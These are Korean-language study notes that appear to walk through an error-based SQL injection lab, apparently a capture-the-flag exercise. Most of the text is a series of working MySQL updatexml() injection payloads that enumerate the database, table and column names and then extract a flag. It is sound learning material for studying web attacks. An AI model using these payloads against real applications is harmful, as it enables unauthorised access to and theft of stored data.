✔ SQL Injection 공격기법
2. Error Based SQL injection
SQL 에러가 응답에 포함되는 경우 실행
에러를 발생시키면서 원하는 질의문을 실행하는 것이 목적
-논리 에러 V
-문법 에러
사용할 function 검색 -> updatexml()....
Step1. Error 메시지 확인
Step2. Error 출력 활용 함수 선정
1' and updatexml(null,concat(0x3a,(select 'test')),null) and '1'='1
Step3. DB 이름 확인
1' and updatexml(null,concat(0x3a,(select database())),null) and '1'='1
DB 이름 : sqli_2
Step4. Table 이름 확인
1' and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema='sqli_2' limit 0,1)),null) and '1'='1
Table 이름 : flag_table
Step5. Column 이름 확인
1' and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_name='flag_table' limit 0,1)),null) and '1'='1
Column 이름 : Flag
Step6. 데이터 추출
1' and updatexml(null,concat(0x3a,(select flag from flag_table)),null) and '1'='1
